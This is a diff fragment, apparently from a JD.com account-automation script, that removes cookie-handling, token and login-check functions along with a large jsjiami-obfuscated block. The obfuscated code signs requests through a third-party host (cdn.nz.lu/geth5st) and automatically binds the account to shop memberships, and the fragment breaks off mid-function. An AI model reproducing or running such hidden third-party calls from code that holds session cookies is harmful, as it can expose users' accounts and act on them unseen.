? process.env.JD_USER_AGENT ? process.env.JD_USER_AGENT : require("./USER_AGENTS").USER_AGENT : $.getdata("JDUA") ? $.getdata("JDUA") : "jdapp;iPhone;9.4.4;14.3;network/4g;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1", - }, - }, - (err, resp, data) => { - try { - if (err) { - $.getFirstLZCKerr = err - console.log(err); - } else { - if (resp["headers"]["set-cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - if (resp["headers"]["Set-Cookie"]) { - cookie = `${originCookie}`; - if ($.isNode()) { - for (let sk of resp["headers"]["set-cookie"]) { - cookie = `${cookie}${sk.split(";")[0]};`; - } - } else { - for (let ck of resp["headers"]["Set-Cookie"].split(",")) { - cookie = `${cookie}${ck.split(";")[0]};`; - } - } - } - } - $.cookie = cookie - } catch (error) { - console.log(error); - } finally { - resolve(); - } - } - ); - }); -} -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: "api.m.jd.com", - "Content-Type": "application/x-www-form-urlencoded", - Accept: "*/*", - Connection: "keep-alive", - Cookie: cookie, - "User-Agent": "JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)", - "Accept-Language": "zh-Hans-CN;q=1", - "Accept-Encoding": "gzip, deflate, br", - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzkj-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=hjudwgohxzVu96krv&client=apple&clientVersion=9.4.0&st=1620476162000&sv=111&sign=f9d1b7e3b943b6a136d54fe4f892af05`, - }; - return new Promise((resolve) => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token; - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (error) { - $.log(error); - } finally { - resolve(); - } - }); - }); -} -function random(min, max) { - return Math.floor(Math.random() * (max - min)) + min; -} -function getUUID(format = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = (Math.random() * 16) | 0, - v = c == "x" ? r : (r & 0x3) | 0x8; - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36); - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - Host: "me-api.jd.com", - Accept: "*/*", - Connection: "keep-alive", - Cookie: cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - Referer: "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - }, - }; - return new Promise((resolve) => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err); - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log("京东返回了空数据"); - } - } - } catch (e) { - $.logErr(e); - } finally { - resolve(); - } - }); - }); -} -// prettier-ignore -var _0xod7='jsjiami.com.v6',_0xod7_=['‮_0xod7'],_0x1acd=[_0xod7,'\x53\x33\x4a\x54\x56\x32\x4d\x3d','\x54\x47\x4e\x4c\x62\x6e\x6b\x3d','\x62\x47\x39\x6e','\x63\x47\x46\x79\x63\x32\x55\x3d','\x63\x33\x56\x6a\x59\x32\x56\x7a\x63\x77\x3d\x3d','\x63\x6d\x56\x7a\x64\x57\x78\x30','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x55\x6e\x56\x73\x5a\x55\x78\x70\x63\x33\x51\x3d','\x62\x33\x42\x6c\x62\x6b\x4e\x68\x63\x6d\x52\x42\x59\x33\x52\x70\x64\x6d\x6c\x30\x65\x55\x6c\x6b','\x61\x57\x35\x30\x5a\x58\x4a\x6c\x63\x33\x52\x7a\x53\x57\x35\x6d\x62\x77\x3d\x3d','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x4a\x5a\x41\x3d\x3d','\x56\x45\x56\x4a\x59\x57\x38\x3d','\x55\x6d\x78\x6d\x59\x32\x4d\x3d','\x63\x45\x39\x31\x52\x6b\x4d\x3d','\x64\x6e\x5a\x75\x57\x45\x4d\x3d','\x62\x33\x64\x32\x5a\x47\x55\x3d','\x59\x33\x70\x4b\x62\x47\x67\x3d','\x51\x55\x64\x59\x59\x30\x6b\x3d','\x54\x30\x4a\x58\x55\x45\x59\x3d','\x56\x57\x6c\x55\x51\x33\x63\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x49\x3d','\x52\x57\x52\x36\x62\x57\x67\x3d','\x55\x48\x56\x58\x62\x6b\x59\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x38\x3d','\x52\x33\x5a\x75\x55\x6c\x55\x3d','\x52\x6c\x5a\x71\x53\x30\x55\x3d','\x56\x47\x35\x69\x63\x30\x73\x3d','\x61\x6e\x6c\x47\x54\x31\x41\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x51\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x55\x78\x36\x61\x31\x63\x3d','\x56\x6d\x74\x75\x62\x33\x51\x3d','\x54\x56\x6c\x6f\x54\x45\x4d\x3d','\x62\x58\x64\x34\x52\x47\x30\x3d','\x65\x6c\x5a\x70\x59\x57\x34\x3d','\x52\x55\x46\x4a\x51\x6b\x45\x3d','\x53\x57\x70\x7a\x59\x6b\x6f\x3d','\x56\x55\x74\x79\x61\x46\x55\x3d','\x56\x32\x74\x69\x53\x45\x77\x3d','\x54\x46\x4a\x49\x61\x6b\x77\x3d','\x54\x30\x4e\x44\x54\x6e\x63\x3d','\x56\x31\x70\x7a\x57\x56\x6f\x3d','\x56\x33\x4e\x72\x63\x48\x67\x3d','\x61\x56\x42\x6b\x5a\x58\x67\x3d','\x51\x6e\x64\x6c\x55\x31\x63\x3d','\x65\x57\x35\x5a\x63\x58\x49\x3d','\x63\x47\x74\x50\x64\x58\x4d\x3d','\x57\x6d\x56\x5a\x62\x6c\x67\x3d','\x61\x56\x68\x4e\x54\x33\x6b\x3d','\x62\x56\x5a\x33\x65\x56\x67\x3d','\x55\x47\x4a\x50\x51\x55\x49\x3d','\x54\x33\x68\x74\x56\x57\x59\x3d','\x62\x55\x31\x52\x61\x33\x59\x3d','\x53\x57\x4a\x45\x62\x56\x45\x3d','\x59\x6d\x6c\x75\x5a\x46\x64\x70\x64\x47\x68\x57\x5a\x57\x35\x6b\x5a\x58\x4a\x74\x5a\x58\x4e\x7a\x59\x57\x64\x6c','\x62\x57\x56\x7a\x63\x32\x46\x6e\x5a\x51\x3d\x3d','\x5a\x57\x35\x32','\x55\x30\x6c\x48\x54\x6c\x39\x56\x55\x6b\x77\x3d','\x59\x6d\x52\x6e\x63\x30\x30\x3d','\x57\x6b\x74\x34\x53\x6b\x34\x3d','\x59\x30\x56\x51\x63\x6d\x4d\x3d','\x65\x45\x64\x72\x54\x47\x38\x3d','\x5a\x45\x74\x57\x64\x6d\x67\x3d','\x51\x58\x68\x73\x63\x6d\x6f\x3d','\x4f\x47\x46\x6b\x5a\x6d\x49\x3d','\x61\x6d\x52\x66\x63\x32\x68\x76\x63\x46\x39\x74\x5a\x57\x31\x69\x5a\x58\x49\x3d','\x4f\x53\x34\x79\x4c\x6a\x41\x3d','\x61\x6d\x52\x7a\x61\x57\x64\x75\x4c\x6d\x4e\x6d','\x59\x58\x42\x77\x62\x47\x6c\x6a\x59\x58\x52\x70\x62\x32\x34\x76\x61\x6e\x4e\x76\x62\x67\x3d\x3d','\x64\x6c\x6c\x43\x5a\x45\x67\x3d','\x51\x6b\x31\x47\x61\x33\x6b\x3d','\x61\x58\x56\x36\x61\x31\x45\x3d','\x5a\x30\x68\x33\x52\x58\x6f\x3d','\x55\x32\x56\x4d\x52\x6e\x45\x3d','\x52\x57\x35\x59\x65\x6c\x6b\x3d','\x55\x48\x70\x34\x63\x55\x67\x3d','\x54\x6c\x52\x42\x55\x56\x41\x3d','\x61\x30\x56\x78\x65\x6e\x45\x3d','\x61\x6c\x5a\x59\x63\x48\x45\x3d','\x51\x57\x31\x4f\x63\x6b\x6b\x3d','\x63\x57\x6c\x43\x64\x32\x63\x3d','\x5a\x6d\x78\x76\x62\x33\x49\x3d','\x62\x46\x6c\x57\x65\x47\x73\x3d','\x63\x6d\x46\x75\x5a\x47\x39\x74','\x62\x47\x56\x75\x5a\x33\x52\x6f','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6a\x5a\x47\x34\x75\x62\x6e\x6f\x75\x62\x48\x55\x76\x5a\x32\x56\x30\x61\x44\x56\x7a\x64\x41\x3d\x3d','\x52\x47\x5a\x61\x62\x32\x67\x3d','\x57\x45\x4e\x36\x62\x6e\x59\x3d','\x63\x47\x39\x7a\x64\x41\x3d\x3d','\x53\x6b\x64\x4a\x53\x6b\x6f\x3d','\x59\x30\x78\x31\x57\x56\x63\x3d','\x53\x6d\x56\x74\x64\x6b\x67\x3d','\x56\x46\x4e\x6c\x59\x55\x59\x3d','\x5a\x6c\x64\x6d\x54\x31\x51\x3d','\x59\x58\x42\x77\x62\x48\x6b\x3d','\x65\x6b\x39\x49\x64\x45\x67\x3d','\x56\x46\x70\x75\x51\x6d\x6f\x3d','\x62\x47\x39\x6e\x52\x58\x4a\x79','\x61\x30\x64\x42\x55\x55\x51\x3d','\x56\x46\x6c\x48\x57\x48\x6f\x3d','\x59\x58\x42\x70\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74','\x4b\x69\x38\x71','\x61\x32\x56\x6c\x63\x43\x31\x68\x62\x47\x6c\x32\x5a\x51\x3d\x3d','\x65\x6d\x67\x74\x59\x32\x34\x3d','\x5a\x33\x70\x70\x63\x43\x77\x67\x5a\x47\x56\x6d\x62\x47\x46\x30\x5a\x53\x77\x67\x59\x6e\x49\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x39\x68\x63\x48\x42\x70\x5a\x44\x31\x71\x5a\x46\x39\x7a\x61\x47\x39\x77\x58\x32\x31\x6c\x62\x57\x4a\x6c\x63\x69\x5a\x6d\x64\x57\x35\x6a\x64\x47\x6c\x76\x62\x6b\x6c\x6b\x50\x57\x64\x6c\x64\x46\x4e\x6f\x62\x33\x42\x50\x63\x47\x56\x75\x51\x32\x46\x79\x5a\x45\x6c\x75\x5a\x6d\x38\x6d\x59\x6d\x39\x6b\x65\x54\x30\x3d','\x65\x47\x52\x75\x51\x6c\x49\x3d','\x63\x33\x52\x79\x61\x57\x35\x6e\x61\x57\x5a\x35','\x4a\x6d\x4e\x73\x61\x57\x56\x75\x64\x44\x31\x49\x4e\x53\x5a\x6a\x62\x47\x6c\x6c\x62\x6e\x52\x57\x5a\x58\x4a\x7a\x61\x57\x39\x75\x50\x54\x6b\x75\x4d\x69\x34\x77\x4a\x6e\x56\x31\x61\x57\x51\x39\x4f\x44\x67\x34\x4f\x44\x67\x3d','\x55\x6b\x70\x46\x55\x33\x6f\x3d','\x62\x48\x5a\x6c\x64\x6e\x67\x3d','\x59\x31\x68\x71\x63\x6e\x41\x3d','\x61\x6d\x52\x68\x63\x48\x41\x37\x61\x56\x42\x6f\x62\x32\x35\x6c\x4f\x7a\x6b\x75\x4e\x53\x34\x30\x4f\x7a\x45\x7a\x4c\x6a\x59\x37','\x56\x56\x56\x4a\x52\x41\x3d\x3d','\x4f\x32\x35\x6c\x64\x48\x64\x76\x63\x6d\x73\x76\x64\x32\x6c\x6d\x61\x54\x74\x42\x52\x45\x6c\x45\x4c\x77\x3d\x3d','\x51\x55\x52\x4a\x52\x41\x3d\x3d','\x4f\x32\x31\x76\x5a\x47\x56\x73\x4c\x32\x6c\x51\x61\x47\x39\x75\x5a\x54\x45\x77\x4c\x44\x4d\x37\x59\x57\x52\x6b\x63\x6d\x56\x7a\x63\x32\x6c\x6b\x4c\x7a\x41\x37\x59\x58\x42\x77\x51\x6e\x56\x70\x62\x47\x51\x76\x4d\x54\x59\x33\x4e\x6a\x59\x34\x4f\x32\x70\x6b\x55\x33\x56\x77\x63\x47\x39\x79\x64\x45\x52\x68\x63\x6d\x74\x4e\x62\x32\x52\x6c\x4c\x7a\x41\x37\x54\x57\x39\x36\x61\x57\x78\x73\x59\x53\x38\x31\x4c\x6a\x41\x67\x4b\x47\x6c\x51\x61\x47\x39\x75\x5a\x54\x73\x67\x51\x31\x42\x56\x49\x47\x6c\x51\x61\x47\x39\x75\x5a\x53\x42\x50\x55\x79\x41\x78\x4d\x31\x38\x32\x49\x47\x78\x70\x61\x32\x55\x67\x54\x57\x46\x6a\x49\x45\x39\x54\x49\x46\x67\x70\x49\x45\x46\x77\x63\x47\x78\x6c\x56\x32\x56\x69\x53\x32\x6c\x30\x4c\x7a\x59\x77\x4e\x53\x34\x78\x4c\x6a\x45\x31\x49\x43\x68\x4c\x53\x46\x52\x4e\x54\x43\x77\x67\x62\x47\x6c\x72\x5a\x53\x42\x48\x5a\x57\x4e\x72\x62\x79\x6b\x67\x54\x57\x39\x69\x61\x57\x78\x6c\x4c\x7a\x45\x31\x52\x54\x45\x30\x4f\x44\x74\x7a\x64\x58\x42\x77\x62\x33\x4a\x30\x53\x6b\x52\x54\x53\x46\x64\x4c\x4c\x7a\x45\x3d','\x61\x57\x4a\x49\x5a\x48\x45\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x7a\x61\x47\x39\x77\x62\x57\x56\x74\x59\x6d\x56\x79\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74\x4c\x33\x4e\x6f\x62\x33\x42\x6a\x59\x58\x4a\x6b\x4c\x7a\x39\x32\x5a\x57\x35\x6b\x5a\x58\x4a\x4a\x5a\x44\x30\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x67\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x56\x63\x6d\x77\x3d','\x5a\x55\x64\x48\x65\x6e\x67\x3d','\x61\x58\x46\x34\x57\x55\x38\x3d','\x59\x56\x52\x6b\x65\x6d\x55\x3d','\x62\x56\x52\x51\x65\x55\x63\x3d','\x5a\x32\x56\x30','\x6a\x6b\x73\x6a\x45\x69\x48\x61\x6d\x69\x64\x53\x2e\x63\x54\x6f\x6d\x43\x2e\x76\x36\x68\x6c\x45\x45\x56\x50\x75\x56\x3d\x3d'];if(function(_0x47dca4,_0x2e45a0,_0x2d0d38){function _0x358c40(_0x4e0fee,_0x44d395,_0x5f1629,_0x6d2cae,_0x379df8,_0x59c1d4){_0x44d395=_0x44d395>>0x8,_0x379df8='po';var _0x24e0cd='shift',_0x197297='push',_0x59c1d4='‮';if(_0x44d395<_0x4e0fee){while(--_0x4e0fee){_0x6d2cae=_0x47dca4[_0x24e0cd]();if(_0x44d395===_0x4e0fee&&_0x59c1d4==='‮'&&_0x59c1d4['length']===0x1){_0x44d395=_0x6d2cae,_0x5f1629=_0x47dca4[_0x379df8+'p']();}else if(_0x44d395&&_0x5f1629['replace'](/[kEHdSTChlEEVPuV=]/g,'')===_0x44d395){_0x47dca4[_0x197297](_0x6d2cae);}}_0x47dca4[_0x197297](_0x47dca4[_0x24e0cd]());}return 0xdaf2e;};return _0x358c40(++_0x2e45a0,_0x2d0d38)>>_0x2e45a0^_0x2d0d38;}(_0x1acd,0x1d5,0x1d500),_0x1acd){_0xod7_=_0x1acd['length']^0x1d5;};function _0x27de(_0x4ab799,_0x2148e0){_0x4ab799=~~'0x'['concat'](_0x4ab799['slice'](0x1));var _0x38aa70=_0x1acd[_0x4ab799];if(_0x27de['HEabFd']===undefined&&'‮'['length']===0x1){(function(){var _0x48587b=function(){var _0x226fa7;try{_0x226fa7=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x302471){_0x226fa7=window;}return _0x226fa7;};var _0x2dcb25=_0x48587b();var _0x5d0b0e='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2dcb25['atob']||(_0x2dcb25['atob']=function(_0x41138d){var _0x37290e=String(_0x41138d)['replace'](/=+$/,'');for(var _0x1da2f9=0x0,_0x27e844,_0x496c4d,_0x55ec30=0x0,_0x46993b='';_0x496c4d=_0x37290e['charAt'](_0x55ec30++);~_0x496c4d&&(_0x27e844=_0x1da2f9%0x4?_0x27e844*0x40+_0x496c4d:_0x496c4d,_0x1da2f9++%0x4)?_0x46993b+=String['fromCharCode'](0xff&_0x27e844>>(-0x2*_0x1da2f9&0x6)):0x0){_0x496c4d=_0x5d0b0e['indexOf'](_0x496c4d);}return _0x46993b;});}());_0x27de['ciicrd']=function(_0x35e622){var _0x1ca022=atob(_0x35e622);var _0x460af0=[];for(var _0x27de2b=0x0,_0x1b5b31=_0x1ca022['length'];_0x27de2b<_0x1b5b31;_0x27de2b++){_0x460af0+='%'+('00'+_0x1ca022['charCodeAt'](_0x27de2b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x460af0);};_0x27de['qeLOEi']={};_0x27de['HEabFd']=!![];}var _0x4e1a4f=_0x27de['qeLOEi'][_0x4ab799];if(_0x4e1a4f===undefined){_0x38aa70=_0x27de['ciicrd'](_0x38aa70);_0x27de['qeLOEi'][_0x4ab799]=_0x38aa70;}else{_0x38aa70=_0x4e1a4f;}return _0x38aa70;};function getShopOpenCardInfo(_0x2dfe13,_0x2a9c59){var _0x169e2b={'\x69\x71\x78\x59\x4f':function(_0x237960,_0x2865f7){return _0x237960===_0x2865f7;},'\x61\x54\x64\x7a\x65':_0x27de('‮0'),'\x6d\x54\x50\x79\x47':function(_0x5db734){return _0x5db734();},'\x78\x64\x6e\x42\x52':function(_0x27ef1f,_0x2696d1){return _0x27ef1f(_0x2696d1);},'\x52\x4a\x45\x53\x7a':_0x27de('‫1'),'\x6c\x76\x65\x76\x78':_0x27de('‫2'),'\x63\x58\x6a\x72\x70':_0x27de('‫3'),'\x69\x62\x48\x64\x71':_0x27de('‮4'),'\x65\x47\x47\x7a\x78':_0x27de('‫5')};let _0x4540b3={'\x75\x72\x6c':_0x27de('‮6')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,JSON[_0x27de('‫8')](_0x2dfe13))+_0x27de('‮9'),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x169e2b[_0x27de('‮a')],'\x41\x63\x63\x65\x70\x74':_0x169e2b[_0x27de('‮b')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x169e2b[_0x27de('‫c')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x169e2b[_0x27de('‫12')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x2a9c59+_0x27de('‮14')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x169e2b[_0x27de('‮16')]}};return new Promise(_0x24d014=>{var _0x45d140={'\x4b\x72\x53\x57\x63':function(_0x564cc4,_0x316683){return _0x169e2b[_0x27de('‫17')](_0x564cc4,_0x316683);},'\x4c\x63\x4b\x6e\x79':_0x169e2b[_0x27de('‫18')],'\x54\x45\x49\x61\x6f':function(_0x32cebc){return _0x169e2b[_0x27de('‫19')](_0x32cebc);}};$[_0x27de('‫1a')](_0x4540b3,(_0x497df1,_0x18ad2f,_0x1d037c)=>{if(_0x45d140[_0x27de('‮1b')](_0x45d140[_0x27de('‮1c')],_0x45d140[_0x27de('‮1c')])){try{if(_0x497df1){console[_0x27de('‫1d')](_0x497df1);}else{res=JSON[_0x27de('‫1e')](_0x1d037c);if(res[_0x27de('‮1f')]){if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}}catch(_0x487efd){console[_0x27de('‫1d')](_0x487efd);}finally{_0x45d140[_0x27de('‮25')](_0x24d014);}}else{console[_0x27de('‫1d')](_0x497df1);}});});}async function bindWithVender(_0x4bf9aa,_0x5a230c){var _0x5180ad={'\x4d\x59\x68\x4c\x43':function(_0x396660){return _0x396660();},'\x6d\x77\x78\x44\x6d':function(_0x4b2169,_0x405a0d){return _0x4b2169!==_0x405a0d;},'\x7a\x56\x69\x61\x6e':_0x27de('‫26'),'\x45\x41\x49\x42\x41':_0x27de('‫27'),'\x49\x6a\x73\x62\x4a':function(_0xcf4ea9,_0x3221b8){return _0xcf4ea9===_0x3221b8;},'\x55\x4b\x72\x68\x55':_0x27de('‫28'),'\x57\x6b\x62\x48\x4c':_0x27de('‫29'),'\x4c\x52\x48\x6a\x4c':_0x27de('‮2a'),'\x4f\x43\x43\x4e\x77':_0x27de('‫2b'),'\x57\x5a\x73\x59\x5a':_0x27de('‫2c'),'\x57\x73\x6b\x70\x78':_0x27de('‮2d'),'\x45\x64\x7a\x6d\x68':function(_0x148959,_0x176008,_0x319ba8){return _0x148959(_0x176008,_0x319ba8);},'\x50\x75\x57\x6e\x46':_0x27de('‮2e'),'\x47\x76\x6e\x52\x55':_0x27de('‫1'),'\x46\x56\x6a\x4b\x45':_0x27de('‫2'),'\x54\x6e\x62\x73\x4b':_0x27de('‫3'),'\x6a\x79\x46\x4f\x50':_0x27de('‮4'),'\x61\x4c\x7a\x6b\x57':function(_0x3768db,_0x1db8ba){return _0x3768db(_0x1db8ba);},'\x56\x6b\x6e\x6f\x74':_0x27de('‫5')};return h5st=await _0x5180ad[_0x27de('‮2f')](geth5st,_0x5180ad[_0x27de('‮30')],_0x4bf9aa),opt={'\x75\x72\x6c':_0x27de('‮31')+h5st,'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x5180ad[_0x27de('‮32')],'\x41\x63\x63\x65\x70\x74':_0x5180ad[_0x27de('‫33')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x5180ad[_0x27de('‮34')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x5180ad[_0x27de('‫35')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x5a230c+_0x27de('‮36')+_0x5180ad[_0x27de('‮37')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x5180ad[_0x27de('‫38')]}},new Promise(_0x2c2848=>{var _0x1f470d={'\x69\x50\x64\x65\x78':function(_0x4c0bea){return _0x5180ad[_0x27de('‫39')](_0x4c0bea);},'\x42\x77\x65\x53\x57':function(_0x240905,_0x2118e5){return _0x5180ad[_0x27de('‫3a')](_0x240905,_0x2118e5);},'\x79\x6e\x59\x71\x72':_0x5180ad[_0x27de('‫3b')],'\x70\x6b\x4f\x75\x73':_0x5180ad[_0x27de('‮3c')],'\x5a\x65\x59\x6e\x58':function(_0x2ff734,_0x50b6d9){return _0x5180ad[_0x27de('‮3d')](_0x2ff734,_0x50b6d9);},'\x69\x58\x4d\x4f\x79':_0x5180ad[_0x27de('‫3e')],'\x6d\x56\x77\x79\x58':function(_0x43cb7f,_0x5f0fa8){return _0x5180ad[_0x27de('‮3d')](_0x43cb7f,_0x5f0fa8);},'\x50\x62\x4f\x41\x42':_0x5180ad[_0x27de('‫3f')],'\x4f\x78\x6d\x55\x66':_0x5180ad[_0x27de('‫40')],'\x49\x62\x44\x6d\x51':_0x5180ad[_0x27de('‫41')],'\x62\x64\x67\x73\x4d':_0x5180ad[_0x27de('‫42')],'\x5a\x4b\x78\x4a\x4e':_0x5180ad[_0x27de('‮43')]};$[_0x27de('‫1a')](opt,(_0x311afb,_0x3b7aab,_0x4c2873)=>{var _0x53384e={'\x6d\x4d\x51\x6b\x76':function(_0x26e196){return _0x1f470d[_0x27de('‫44')](_0x26e196);}};try{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫46')],_0x1f470d[_0x27de('‮47')])){if(_0x311afb){if(_0x1f470d[_0x27de('‫48')](_0x1f470d[_0x27de('‫49')],_0x1f470d[_0x27de('‫49')])){console[_0x27de('‫1d')](_0x311afb);}else{console[_0x27de('‫1d')](error);}}else{if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4b')],_0x1f470d[_0x27de('‮4c')])){_0x53384e[_0x27de('‮4d')](_0x2c2848);}else{res=JSON[_0x27de('‫1e')](_0x4c2873);if(res[_0x27de('‮1f')]){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4e')],_0x1f470d[_0x27de('‫4e')])){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}else{console[_0x27de('‫1d')](_0x311afb);}}}}}else{Host=process[_0x27de('‮51')][_0x27de('‫52')];}}catch(_0x317968){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‮53')],_0x1f470d[_0x27de('‮53')])){console[_0x27de('‫1d')](_0x317968);}else{$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}finally{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫54')],_0x1f470d[_0x27de('‫54')])){_0x1f470d[_0x27de('‫44')](_0x2c2848);}else{_0x1f470d[_0x27de('‫44')](_0x2c2848);}}});});}function geth5st(_0x1c2dc4,_0x38bbf9){var _0xad3eae={'\x76\x59\x42\x64\x48':function(_0xb6682a,_0x1dbeb1){return _0xb6682a===_0x1dbeb1;},'\x42\x4d\x46\x6b\x79':_0x27de('‮55'),'\x69\x75\x7a\x6b\x51':function(_0x521e0c,_0x1ffbd9){return _0x521e0c!==_0x1ffbd9;},'\x67\x48\x77\x45\x7a':_0x27de('‮56'),'\x53\x65\x4c\x46\x71':_0x27de('‮57'),'\x45\x6e\x58\x7a\x59':function(_0x4fa54e,_0x1f1dc2){return _0x4fa54e===_0x1f1dc2;},'\x50\x7a\x78\x71\x48':_0x27de('‮58'),'\x4e\x54\x41\x51\x50':function(_0x3fd51b,_0x32a444){return _0x3fd51b(_0x32a444);},'\x6b\x45\x71\x7a\x71':_0x27de('‫59'),'\x6a\x56\x58\x70\x71':_0x27de('‫5a'),'\x41\x6d\x4e\x72\x49':_0x27de('‮5b'),'\x71\x69\x42\x77\x67':_0x27de('‫5c'),'\x6c\x59\x56\x78\x6b':function(_0x2a05e2,_0x15824){return _0x2a05e2*_0x15824;},'\x44\x66\x5a\x6f\x68':_0x27de('‫5d'),'\x58\x43\x7a\x6e\x76':function(_0x46d10b,_0x5b5da1){return _0x46d10b*_0x5b5da1;}};return new Promise(async _0x573221=>{var _0x1c0efb={'\x4a\x47\x49\x4a\x4a':function(_0x30195c,_0x3fe97e){return _0xad3eae[_0x27de('‮5e')](_0x30195c,_0x3fe97e);},'\x63\x4c\x75\x59\x57':_0xad3eae[_0x27de('‫5f')],'\x4a\x65\x6d\x76\x48':function(_0x41b061,_0x2c0980){return _0xad3eae[_0x27de('‫60')](_0x41b061,_0x2c0980);},'\x54\x53\x65\x61\x46':_0xad3eae[_0x27de('‫61')],'\x66\x57\x66\x4f\x54':_0xad3eae[_0x27de('‮62')],'\x7a\x4f\x48\x74\x48':function(_0x1029f8,_0x21337a){return _0xad3eae[_0x27de('‮63')](_0x1029f8,_0x21337a);},'\x54\x5a\x6e\x42\x6a':_0xad3eae[_0x27de('‫64')],'\x6b\x47\x41\x51\x44':function(_0x1b9d1f,_0x3ee921){return _0xad3eae[_0x27de('‫65')](_0x1b9d1f,_0x3ee921);}};let 